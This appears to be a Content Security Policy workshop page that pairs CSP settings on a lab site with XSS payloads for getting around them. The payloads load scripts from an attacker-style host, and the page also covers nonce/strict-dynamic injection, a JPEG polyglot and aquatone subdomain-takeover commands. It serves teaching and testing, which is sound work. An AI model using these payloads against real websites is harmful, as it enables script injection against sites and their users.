# Source Lists

[https://content-security-policy.com/](https://content-security-policy.com/)

[https://cspws.ga/2-src.php](https://cspws.ga/2-src.php)

1. [Wildcard](http://cspws.ga/2-src.php?csp=wildcard)

	```
	<script src=//3v1l.cf/1.js></script>
	<script src=//hsts.pro></script>
	```
	
2. [none](http://cspws.ga/2-src.php?csp=none)

	```
	<script src=//3v1l.cf/1.js></script>
	<script src=//hsts.pro></script>
	```

3. [data:](http://cspws.ga/2-src.php?csp=data)

	```
	<script src=//3v1l.cf/1.js></script>
	<script src=//hsts.pro></script>
	<script src=data:,alert('data')></script>
	```
	
4. [sub:](http://cspws.ga/2-src.php?csp=sub)

	```
	gem install aquatone
	aquatone-discover -d cspws.ga --only-collectors dictionary -t 10 --wordlist /root/sublist.txt
	aquatone-takeover -d cspws.ga
	```
	
5. [Script whitesiting](http://cspws.ga/2-src.php?wl-script)

	```
	<script src=//3v1l.cf/1.js></script>
	<script src=//3v1l.cf/2.js></script>
	<script src=//hsts.pro></script>
	```
	
6. [Redirection + script whitesiting](http://cspws.ga/2-src.php?redirection)

	```
	<script src=//3v1l.cf/1.js></script>
	<script src=//3v1l.cf/2.js></script>
	<script src=//hsts.pro></script>
	
	<script src=//cspws.ga/r.php?r=//3v1l.cf/2.js></script>
	<script src=//cspws.ga/r.php?r=//hsts.pro></script>
	```
	
7. [Unsafe inline](http://cspws.ga/2-src.php?csp=unsafe-inline)

	```
	<script src=//3v1l.cf/1.js></script>
	<script>alert(1);</script>
	```
	
8. [nonce=RANDOM](http://cspws.ga/2-src.php?csp=nonce) 

	```
	<script>alert(1)</script>
	<script nonce="RANDOM">alert(2)</script>
	<script nonce="RANDOM">eval('alert(3)')</script>
	```
	
9. [unsafe-eval](http://cspws.ga/2-src.php?csp=nonce) 

	```
	<script>alert(1)</script>
	<script nonce="RANDOM">alert(2)</script>
	<script nonce="RANDOM">eval('alert(3)')</script>
	```
	
10. [sha-256](http://cspws.ga/2-src.php?csp=sha256)

	```
	<script>alert('Hello, world.');</script>
	<script>alert('Hello, world!');</script>
	<script nonce="RANDOM">alert(1)</script>
	```
	
11. [CDN](http://cspws.ga/2-src.php?csp=cdn)
	
	- [CSP evaluator](https://github.com/google/csp-evaluator/blob/master/whitelist_bypasses/json/jsonp.json)
	- [JSONBee](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt)
	- [Burp plugin](https://github.com/koenbuyens/securityheaders/blob/master/burpsecheaders.py)

12. [Image](http://cspws.ga/2-src.php?csp=self)

	- [JPEG polyglots](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)
	- [https://cspws.ga/2-upload.php](https://cspws.ga/2-upload.php)
	- [https://cspws.ga/xss.jpg](https://cspws.ga/xss.jpg)

	```
	<script charset="ISO-8859-1" src="/uploads/xss.jpg-{md5}"></script>
	```
	
13. strict-dynamic

	```
	<script nonce="RANDOM">
	var s = document.createElement('script');
	s.src = '//3v1l.cf/1.js';
	document.head.appendChild(s);
	
	document.write('<scr' + 'ipt src="//3v1l.cf/2.js"></scr' + 'ipt>');
	</script>
	```
	
14. Load external script using non-CSP page

	[https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa](https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa)

	```
	http://cspws.ga/2-csp-wallarm.php?xss=d=document;f=d.createElement(%22iframe%22);f.src=%22/favicon.ico%22;f.onload=function(){f.contentWindow.document.head.append(s)};d.body.append(f);s=d.createElement(%22script%22);s.src=%22//3v1l.cf/2.js%22;
	```
	